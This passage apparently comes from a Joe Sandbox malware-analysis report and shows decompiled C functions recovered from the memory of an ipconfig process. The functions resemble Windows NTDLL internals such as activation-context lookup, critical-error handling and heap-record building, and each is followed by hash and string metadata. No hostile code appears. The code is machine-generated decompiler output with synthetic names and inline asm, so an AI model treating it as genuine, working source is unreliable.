              				void* _t30;
              				signed int _t31;
              
              				_t27 = __ecx;
              				_t29 = __edx;
              				_t31 = 0;
              				_v8 = __edx;
              				if(__edx == 0) {
              					L18:
              					_t30 = 0xc000000d;
              					goto L12;
              				} else {
              					_t26 = _a4;
              					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
              						goto L18;
              					} else {
              						E02EDBB40(__ecx,  &_v16, __ecx);
              						_push(_t26);
              						_push(0);
              						_push(0);
              						_push(_t29);
              						_push( &_v16);
              						_t30 = E02EDA9B0();
              						if(_t30 >= 0) {
              							_t19 =  *_t26;
              							if( *_t26 != 0) {
              								goto L7;
              							} else {
              								 *_a8 =  *_a8 & 0;
              							}
              						} else {
              							if(_t30 != 0xc0000023) {
              								L9:
              								_push(_t26);
              								_push( *_t26);
              								_push(_t31);
              								_push(_v8);
              								_push( &_v16);
              								_t30 = E02EDA9B0();
              								if(_t30 < 0) {
              									L12:
              									if(_t31 != 0) {
              										L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
              									}
              								} else {
              									 *_a8 = _t31;
              								}
              							} else {
              								_t19 =  *_t26;
              								if( *_t26 == 0) {
              									_t31 = 0;
              								} else {
              									L7:
              									_t31 = L02EB4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
              								}
              								if(_t31 == 0) {
              									_t30 = 0xc0000017;
              								} else {
              									goto L9;
              								}
              							}
              						}
              					}
              				}
              				return _t30;
              			}










              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: WindowsExcludedProcs
              • API String ID: 0-3583428290
              • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
              • Instruction ID: f54b42c0e624b64628de376fa4639b0bafd6ee3f40ce237357c52cb5e49b961f
              • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
              • Instruction Fuzzy Hash: 9421F837581128ABCB25DA55C850FDBB7ADAF80758F06D465FD088F200D730ED01EBA1
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E02EBF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
              				intOrPtr _t13;
              				intOrPtr _t14;
              				signed int _t16;
              				signed char _t17;
              				intOrPtr _t19;
              				intOrPtr _t21;
              				intOrPtr _t23;
              				intOrPtr* _t25;
              
              				_t25 = _a8;
              				_t17 = __ecx;
              				if(_t25 == 0) {
              					_t19 = 0xc00000f2;
              					L8:
              					return _t19;
              				}
              				if((__ecx & 0xfffffffe) != 0) {
              					_t19 = 0xc00000ef;
              					goto L8;
              				}
              				_t19 = 0;
              				 *_t25 = 0;
              				_t21 = 0;
              				_t23 = "Actx ";
              				if(__edx != 0) {
              					if(__edx == 0xfffffffc) {
              						L21:
              						_t21 = 0x200;
              						L5:
              						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
              						 *_t25 = _t13;
              						L6:
              						if(_t13 == 0) {
              							if((_t17 & 0x00000001) != 0) {
              								 *_t25 = _t23;
              							}
              						}
              						L7:
              						goto L8;
              					}
              					if(__edx == 0xfffffffd) {
              						 *_t25 = _t23;
              						_t13 = _t23;
              						goto L6;
              					}
              					_t13 =  *((intOrPtr*)(__edx + 0x10));
              					 *_t25 = _t13;
              					L14:
              					if(_t21 == 0) {
              						goto L6;
              					}
              					goto L5;
              				}
              				_t14 = _a4;
              				if(_t14 != 0) {
              					_t16 =  *(_t14 + 0x14) & 0x00000007;
              					if(_t16 <= 1) {
              						_t21 = 0x1f8;
              						_t13 = 0;
              						goto L14;
              					}
              					if(_t16 == 2) {
              						goto L21;
              					}
              					if(_t16 != 4) {
              						_t19 = 0xc00000f0;
              						goto L7;
              					}
              					_t13 = 0;
              					goto L6;
              				} else {
              					_t21 = 0x1f8;
              					goto L5;
              				}
              			}












              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: Actx
              • API String ID: 0-89312691
              • Opcode ID: 250fd8bfa9eea81b90ede5f880cd72d71b82dfe684cedcfafcf530e280205990
              • Instruction ID: b50b6e2e8eae27e1e908b0563ca1ec167fa4b508d9f83f7777c196ce18aeef2d
              • Opcode Fuzzy Hash: 250fd8bfa9eea81b90ede5f880cd72d71b82dfe684cedcfafcf530e280205990
              • Instruction Fuzzy Hash: 9411D3347A46229BE7264E1D8C907F77295EF8526CF24E5AAF861CBF91D770C800C380
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 71%
              			E02F48DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
              				intOrPtr _t35;
              				void* _t41;
              
              				_t40 = __esi;
              				_t39 = __edi;
              				_t38 = __edx;
              				_t35 = __ecx;
              				_t34 = __ebx;
              				_push(0x74);
              				_push(0x2f70d50);
              				E02EED0E8(__ebx, __edi, __esi);
              				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
              				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
              				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
              					E02F25720(0x65, 0, "Critical error detected %lx\n", _t35);
              					if( *((intOrPtr*)(_t41 + 8)) != 0) {
              						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
              						asm("int3");
              						 *(_t41 - 4) = 0xfffffffe;
              					}
              				}
              				 *(_t41 - 4) = 1;
              				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
              				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
              				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
              				 *((intOrPtr*)(_t41 - 0x64)) = L02EEDEF0;
              				 *((intOrPtr*)(_t41 - 0x60)) = 1;
              				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
              				_push(_t41 - 0x70);
              				L02EEDEF0(1, _t38);
              				 *(_t41 - 4) = 0xfffffffe;
              				return E02EED130(_t34, _t39, _t40);
              			}






              Strings
              • Critical error detected %lx, xrefs: 02F48E21
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: Critical error detected %lx
              • API String ID: 0-802127002
              • Opcode ID: 190980e2d72e1a4469a12cab7365ba328d30cd2ced31d876964b92201dd04271
              • Instruction ID: 28e5cdb3ff95d7c50694695368281fe2d7370f320e8388a0dd9113e0e7a60997
              • Opcode Fuzzy Hash: 190980e2d72e1a4469a12cab7365ba328d30cd2ced31d876964b92201dd04271
              • Instruction Fuzzy Hash: 8C11AD71D50348EBDF24DFE489057ECBBB5BB04794F20825EE62AAB291C7744601CF14
              Uniqueness

              Uniqueness Score: -1.00%

              Strings
              • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 02F2FF60
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
              • API String ID: 0-1911121157
              • Opcode ID: dae3bc58d8d9cd1fc29aabd0e2c34867a0a737e0d5068c923b83fa6295d8e833
              • Instruction ID: c7507ad09b6d25fd3a5a66e7ac2ab23be8e63159260f1efbf483187dfd2a46b0
              • Opcode Fuzzy Hash: dae3bc58d8d9cd1fc29aabd0e2c34867a0a737e0d5068c923b83fa6295d8e833
              • Instruction Fuzzy Hash: 7E1104719A0158EFEF11EB50CD48FA8B7B2FF0A748F54C254F6099B6A0C7389954CB50
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 88%
              			E02F65BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
              				signed int _t296;
              				signed char _t298;
              				signed int _t301;
              				signed int _t306;
              				signed int _t310;
              				signed char _t311;
              				intOrPtr _t312;
              				signed int _t313;
              				void* _t327;
              				signed int _t328;
              				intOrPtr _t329;
              				intOrPtr _t333;
              				signed char _t334;
              				signed int _t336;
              				void* _t339;
              				signed int _t340;
              				signed int _t356;
              				signed int _t362;
              				short _t367;
              				short _t368;
              				short _t373;
              				signed int _t380;
              				void* _t382;
              				short _t385;
              				signed short _t392;
              				signed char _t393;
              				signed int _t395;
              				signed char _t397;
              				signed int _t398;
              				signed short _t402;
              				void* _t406;
              				signed int _t412;
              				signed char _t414;
              				signed short _t416;
              				signed int _t421;
              				signed char _t427;
              				intOrPtr _t434;
              				signed char _t435;
              				signed int _t436;
              				signed int _t442;
              				signed int _t446;
              				signed int _t447;
              				signed int _t451;
              				signed int _t453;
              				signed int _t454;
              				signed int _t455;
              				intOrPtr _t456;
              				intOrPtr* _t457;
              				short _t458;
              				signed short _t462;
              				signed int _t469;
              				intOrPtr* _t474;
              				signed int _t475;
              				signed int _t479;
              				signed int _t480;
              				signed int _t481;
              				short _t485;
              				signed int _t491;
              				signed int* _t494;
              				signed int _t498;
              				signed int _t505;
              				intOrPtr _t506;
              				signed short _t508;
              				signed int _t511;
              				void* _t517;
              				signed int _t519;
              				signed int _t522;
              				void* _t523;
              				signed int _t524;
              				void* _t528;
              				signed int _t529;
              
              				_push(0xd4);
              				_push(0x2f71178);
              				E02EED0E8(__ebx, __edi, __esi);
              				_t494 = __edx;
              				 *(_t528 - 0xcc) = __edx;
              				_t511 = __ecx;
              				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
              				 *(_t528 - 0xbc) = __ecx;
              				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
              				_t434 =  *((intOrPtr*)(_t528 + 0x24));
              				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
              				_t427 = 0;
              				 *(_t528 - 0x74) = 0;
              				 *(_t528 - 0x9c) = 0;
              				 *(_t528 - 0x84) = 0;
              				 *(_t528 - 0xac) = 0;
              				 *(_t528 - 0x88) = 0;
              				 *(_t528 - 0xa8) = 0;
              				 *((intOrPtr*)(_t434 + 0x40)) = 0;
              				if( *(_t528 + 0x1c) <= 0x80) {
              					__eflags =  *(__ecx + 0xc0) & 0x00000004;
              					if(__eflags != 0) {
              						_t421 = E02F64C56(0, __edx, __ecx, __eflags);
              						__eflags = _t421;
              						if(_t421 != 0) {
              							 *((intOrPtr*)(_t528 - 4)) = 0;
              							E02EDD000(0x410);
              							 *(_t528 - 0x18) = _t529;
              							 *(_t528 - 0x9c) = _t529;
              							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
              							E02F65542(_t528 - 0x9c, _t528 - 0x84);
              						}
              					}
              					_t435 = _t427;
              					 *(_t528 - 0xd0) = _t435;
              					_t474 = _t511 + 0x65;
              					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
              					_t511 = 0x18;
              					while(1) {
              						 *(_t528 - 0xa0) = _t427;
              						 *(_t528 - 0xbc) = _t427;
              						 *(_t528 - 0x80) = _t427;
              						 *(_t528 - 0x78) = 0x50;
              						 *(_t528 - 0x79) = _t427;
              						 *(_t528 - 0x7a) = _t427;
              						 *(_t528 - 0x8c) = _t427;
              						 *(_t528 - 0x98) = _t427;
              						 *(_t528 - 0x90) = _t427;
              						 *(_t528 - 0xb0) = _t427;
              						 *(_t528 - 0xb8) = _t427;
              						_t296 = 1 << _t435;
              						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
              						__eflags = _t436 & _t296;
              						if((_t436 & _t296) != 0) {
              							goto L92;
              						}
              						__eflags =  *((char*)(_t474 - 1));
              						if( *((char*)(_t474 - 1)) == 0) {
              							goto L92;
              						}
              						_t301 =  *_t474;
              						__eflags = _t494[1] - _t301;
              						if(_t494[1] <= _t301) {
              							L10:
              							__eflags =  *(_t474 - 5) & 0x00000040;
              							if(( *(_t474 - 5) & 0x00000040) == 0) {
              								L12:
              								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
              								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
              									goto L92;
              								}
              								_t442 =  *(_t474 - 0x11) & _t494[3];
              								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
              								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
              									goto L92;
              								}
              								__eflags = _t442 -  *(_t474 - 0x11);
              								if(_t442 !=  *(_t474 - 0x11)) {
              									goto L92;
              								}
              								L15:
              								_t306 =  *(_t474 + 1) & 0x000000ff;
              								 *(_t528 - 0xc0) = _t306;
              								 *(_t528 - 0xa4) = _t306;
              								__eflags =  *0x2f860e8;
              								if( *0x2f860e8 != 0) {
              									__eflags = _t306 - 0x40;
              									if(_t306 < 0x40) {
              										L20:
              										asm("lock inc dword [eax]");
              										_t310 =  *0x2f860e8; // 0x0
              										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
              										__eflags = _t311 & 0x00000001;
              										if((_t311 & 0x00000001) == 0) {
              											 *(_t528 - 0xa0) = _t311;
              											_t475 = _t427;
              											 *(_t528 - 0x74) = _t427;
              											__eflags = _t475;
              											if(_t475 != 0) {
              												L91:
              												_t474 =  *((intOrPtr*)(_t528 - 0x94));
              												goto L92;
              											}
              											asm("sbb edi, edi");
              											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
              											_t511 = _t498;
              											_t312 =  *((intOrPtr*)(_t528 - 0x94));
              											__eflags =  *(_t312 - 5) & 1;
              											if(( *(_t312 - 5) & 1) != 0) {
              												_push(_t528 - 0x98);
              												_push(0x4c);
              												_push(_t528 - 0x70);
              												_push(1);
              												_push(0xfffffffa);
              												_t412 = E02ED9710();
              												_t475 = _t427;
              												__eflags = _t412;
              												if(_t412 >= 0) {
              													_t414 =  *(_t528 - 0x98) - 8;
              													 *(_t528 - 0x98) = _t414;
              													_t416 = _t414 + 0x0000000f & 0x0000fff8;
              													 *(_t528 - 0x8c) = _t416;
              													 *(_t528 - 0x79) = 1;
              													_t511 = (_t416 & 0x0000ffff) + _t498;
              													__eflags = _t511;
              												}
              											}
              											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
              											__eflags = _t446 & 0x00000004;
              											if((_t446 & 0x00000004) != 0) {
              												__eflags =  *(_t528 - 0x9c);
              												if( *(_t528 - 0x9c) != 0) {
              													 *(_t528 - 0x7a) = 1;
              													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
              													__eflags = _t511;
              												}
              											}
              											_t313 = 2;
              											_t447 = _t446 & _t313;
              											__eflags = _t447;
              											 *(_t528 - 0xd4) = _t447;
              											if(_t447 != 0) {
              												_t406 = 0x10;
              												_t511 = _t511 + _t406;
              												__eflags = _t511;
              											}
              											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
              											 *(_t528 - 0x88) = _t427;
              											__eflags =  *(_t528 + 0x1c);
              											if( *(_t528 + 0x1c) <= 0) {
              												L45:
              												__eflags =  *(_t528 - 0xb0);
              												if( *(_t528 - 0xb0) != 0) {
              													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
              													__eflags = _t511;
              												}
              												__eflags = _t475;
              												if(_t475 != 0) {
              													asm("lock dec dword [ecx+edx*8+0x4]");
              													goto L100;
              												} else {
              													_t494[3] = _t511;
              													_t451 =  *(_t528 - 0xa0);
              													_t427 = E02ED6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
              													 *(_t528 - 0x88) = _t427;
              													__eflags = _t427;
              													if(_t427 == 0) {
              														__eflags = _t511 - 0xfff8;
              														if(_t511 <= 0xfff8) {
              															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
              															asm("sbb ecx, ecx");
              															__eflags = (_t451 & 0x000000e2) + 8;
              														}
              														asm("lock dec dword [eax+edx*8+0x4]");
              														L100:
              														goto L101;
              													}
              													_t453 =  *(_t528 - 0xa0);
              													 *_t494 = _t453;
              													_t494[1] = _t427;
              													_t494[2] =  *(_t528 - 0xbc);
              													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
              													 *_t427 =  *(_t453 + 0x24) | _t511;
              													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
              													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
              													asm("movsd");
              													asm("movsd");
              													asm("movsd");
              													asm("movsd");
              													asm("movsd");
              													asm("movsd");
              													asm("movsd");
              													asm("movsd");
              													__eflags =  *(_t528 + 0x14);
              													if( *(_t528 + 0x14) == 0) {
              														__eflags =  *[fs:0x18] + 0xf50;
              													}
              													asm("movsd");
              													asm("movsd");
              													asm("movsd");
              													asm("movsd");
              													__eflags =  *(_t528 + 0x18);
              													if( *(_t528 + 0x18) == 0) {
              														_t454 =  *(_t528 - 0x80);
              														_t479 =  *(_t528 - 0x78);
              														_t327 = 1;
              														__eflags = 1;
              													} else {
              														_t146 = _t427 + 0x50; // 0x50
              														_t454 = _t146;
              														 *(_t528 - 0x80) = _t454;
              														_t382 = 0x18;
              														 *_t454 = _t382;
              														 *((short*)(_t454 + 2)) = 1;
              														_t385 = 0x10;
              														 *((short*)(_t454 + 6)) = _t385;
              														 *(_t454 + 4) = 0;
              														asm("movsd");
              														asm("movsd");
              														asm("movsd");
              														asm("movsd");
              														_t327 = 1;
              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
              														_t479 = 0x68;
              														 *(_t528 - 0x78) = _t479;
              													}
              													__eflags =  *(_t528 - 0x79) - _t327;
              													if( *(_t528 - 0x79) == _t327) {
              														_t524 = _t479 + _t427;
              														_t508 =  *(_t528 - 0x8c);
              														 *_t524 = _t508;
              														_t373 = 2;
              														 *((short*)(_t524 + 2)) = _t373;
              														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
              														 *((short*)(_t524 + 4)) = 0;
              														_t167 = _t524 + 8; // 0x8
              														E02EDF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
              														_t529 = _t529 + 0xc;
              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
              														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
              														 *(_t528 - 0x78) = _t479;
              														_t380 =  *(_t528 - 0x80);
              														__eflags = _t380;
              														if(_t380 != 0) {
              															_t173 = _t380 + 4;
              															 *_t173 =  *(_t380 + 4) | 1;
              															__eflags =  *_t173;
              														}
              														_t454 = _t524;
              														 *(_t528 - 0x80) = _t454;
              														_t327 = 1;
              														__eflags = 1;
              													}
              													__eflags =  *(_t528 - 0xd4);
              													if( *(_t528 - 0xd4) == 0) {
              														_t505 =  *(_t528 - 0x80);
              													} else {
              														_t505 = _t479 + _t427;
              														_t523 = 0x10;
              														 *_t505 = _t523;
              														_t367 = 3;
              														 *((short*)(_t505 + 2)) = _t367;
              														_t368 = 4;
              														 *((short*)(_t505 + 6)) = _t368;
              														 *(_t505 + 4) = 0;
              														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
              														_t327 = 1;
              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
              														_t479 = _t479 + _t523;
              														 *(_t528 - 0x78) = _t479;
              														__eflags = _t454;
              														if(_t454 != 0) {
              															_t186 = _t454 + 4;
              															 *_t186 =  *(_t454 + 4) | 1;
              															__eflags =  *_t186;
              														}
              														 *(_t528 - 0x80) = _t505;
              													}
              													__eflags =  *(_t528 - 0x7a) - _t327;
              													if( *(_t528 - 0x7a) == _t327) {
              														 *(_t528 - 0xd4) = _t479 + _t427;
              														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
              														E02EDF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
              														_t529 = _t529 + 0xc;
              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
              														_t479 =  *(_t528 - 0x78) + _t522;
              														 *(_t528 - 0x78) = _t479;
              														__eflags = _t505;
              														if(_t505 != 0) {
              															_t199 = _t505 + 4;
              															 *_t199 =  *(_t505 + 4) | 1;
              															__eflags =  *_t199;
              														}
              														_t505 =  *(_t528 - 0xd4);
              														 *(_t528 - 0x80) = _t505;
              													}
              													__eflags =  *(_t528 - 0xa8);
              													if( *(_t528 - 0xa8) != 0) {
              														_t356 = _t479 + _t427;
              														 *(_t528 - 0xd4) = _t356;
              														_t462 =  *(_t528 - 0xac);
              														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
              														_t485 = 0xc;
              														 *((short*)(_t356 + 2)) = _t485;
              														 *(_t356 + 6) = _t462;
              														 *((short*)(_t356 + 4)) = 0;
              														_t211 = _t356 + 8; // 0x9
              														E02EDF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
              														E02EDFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
              														_t529 = _t529 + 0x18;
              														_t427 =  *(_t528 - 0x88);
              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
              														_t505 =  *(_t528 - 0xd4);
              														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
              														 *(_t528 - 0x78) = _t479;
              														_t362 =  *(_t528 - 0x80);
              														__eflags = _t362;
              														if(_t362 != 0) {
              															_t222 = _t362 + 4;
              															 *_t222 =  *(_t362 + 4) | 1;
              															__eflags =  *_t222;
              														}
              													}
              													__eflags =  *(_t528 - 0xb0);
              													if( *(_t528 - 0xb0) != 0) {
              														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
              														_t458 = 0xb;
              														 *((short*)(_t479 + _t427 + 2)) = _t458;
              														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
              														 *((short*)(_t427 + 4 + _t479)) = 0;
              														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
              														E02EDFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
              														_t529 = _t529 + 0xc;
              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
              														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
              														 *(_t528 - 0x78) = _t479;
              														__eflags = _t505;
              														if(_t505 != 0) {
              															_t241 = _t505 + 4;
              															 *_t241 =  *(_t505 + 4) | 1;
              															__eflags =  *_t241;
              														}
              													}
              													_t328 =  *(_t528 + 0x1c);
              													__eflags = _t328;
              													if(_t328 == 0) {
              														L87:
              														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
              														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
              														_t455 =  *(_t528 - 0xdc);
              														 *(_t427 + 0x14) = _t455;
              														_t480 =  *(_t528 - 0xa0);
              														_t517 = 3;
              														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
              														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
              															asm("rdtsc");
              															 *(_t427 + 0x3c) = _t480;
              														} else {
              															 *(_t427 + 0x3c) = _t455;
              														}
              														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
              														_t456 =  *[fs:0x18];
              														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
              														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
              														_t427 = 0;
              														__eflags = 0;
              														_t511 = 0x18;
              														goto L91;
              													} else {
              														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
              														__eflags = _t519;
              														 *(_t528 - 0x8c) = _t328;
              														do {
              															_t506 =  *((intOrPtr*)(_t519 - 4));
              															_t457 =  *((intOrPtr*)(_t519 - 0xc));
              															 *(_t528 - 0xd4) =  *(_t519 - 8);
              															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
              															__eflags =  *(_t333 + 0x36) & 0x00004000;
              															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
              																_t334 =  *_t519;
              															} else {
              																_t334 = 0;
              															}
              															_t336 = _t334 & 0x000000ff;
              															__eflags = _t336;
              															_t427 =  *(_t528 - 0x88);
              															if(_t336 == 0) {
              																_t481 = _t479 + _t506;
              																__eflags = _t481;
              																 *(_t528 - 0x78) = _t481;
              																E02EDF3E0(_t479 + _t427, _t457, _t506);
              																_t529 = _t529 + 0xc;
              															} else {
              																_t340 = _t336 - 1;
              																__eflags = _t340;
              																if(_t340 == 0) {
              																	E02EDF3E0( *(_t528 - 0xb8), _t457, _t506);
              																	_t529 = _t529 + 0xc;
              																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
              																} else {
              																	__eflags = _t340 == 0;
              																	if(_t340 == 0) {
              																		__eflags = _t506 - 8;
              																		if(_t506 == 8) {
              																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
              																			 *(_t528 - 0xdc) =  *(_t457 + 4);
              																		}
              																	}
              																}
              															}
              															_t339 = 0x10;
              															_t519 = _t519 + _t339;
              															_t263 = _t528 - 0x8c;
              															 *_t263 =  *(_t528 - 0x8c) - 1;
              															__eflags =  *_t263;
              															_t479 =  *(_t528 - 0x78);
              														} while ( *_t263 != 0);
              														goto L87;
              													}
              												}
              											} else {
              												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
              												 *(_t528 - 0xa2) = _t392;
              												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
              												__eflags = _t469;
              												while(1) {
              													 *(_t528 - 0xe4) = _t511;
              													__eflags = _t392;
              													_t393 = _t427;
              													if(_t392 != 0) {
              														_t393 =  *((intOrPtr*)(_t469 + 4));
              													}
              													_t395 = (_t393 & 0x000000ff) - _t427;
              													__eflags = _t395;
              													if(_t395 == 0) {
              														_t511 = _t511 +  *_t469;
              														__eflags = _t511;
              													} else {
              														_t398 = _t395 - 1;
              														__eflags = _t398;
              														if(_t398 == 0) {
              															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
              															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
              														} else {
              															__eflags = _t398 == 1;
              															if(_t398 == 1) {
              																 *(_t528 - 0xa8) =  *(_t469 - 8);
              																_t402 =  *_t469 & 0x0000ffff;
              																 *(_t528 - 0xac) = _t402;
              																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
              															}
              														}
              													}
              													__eflags = _t511 -  *(_t528 - 0xe4);
              													if(_t511 <  *(_t528 - 0xe4)) {
              														break;
              													}
              													_t397 =  *(_t528 - 0x88) + 1;
              													 *(_t528 - 0x88) = _t397;
              													_t469 = _t469 + 0x10;
              													__eflags = _t397 -  *(_t528 + 0x1c);
              													_t392 =  *(_t528 - 0xa2);
              													if(_t397 <  *(_t528 + 0x1c)) {
              														continue;
              													}
              													goto L45;
              												}
              												_t475 = 0x216;
              												 *(_t528 - 0x74) = 0x216;
              												goto L45;
              											}
              										} else {
              											asm("lock dec dword [eax+ecx*8+0x4]");
              											goto L16;
              										}
              									}
              									_t491 = E02F64CAB(_t306, _t528 - 0xa4);
              									 *(_t528 - 0x74) = _t491;
              									__eflags = _t491;
              									if(_t491 != 0) {
              										goto L91;
              									} else {
              										_t474 =  *((intOrPtr*)(_t528 - 0x94));
              										goto L20;
              									}
              								}
              								L16:
              								 *(_t528 - 0x74) = 0x1069;
              								L93:
              								_t298 =  *(_t528 - 0xd0) + 1;
              								 *(_t528 - 0xd0) = _t298;
              								_t474 = _t474 + _t511;
              								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
              								_t494 = 4;
              								__eflags = _t298 - _t494;
              								if(_t298 >= _t494) {
              									goto L100;
              								}
              								_t494 =  *(_t528 - 0xcc);
              								_t435 = _t298;
              								continue;
              							}
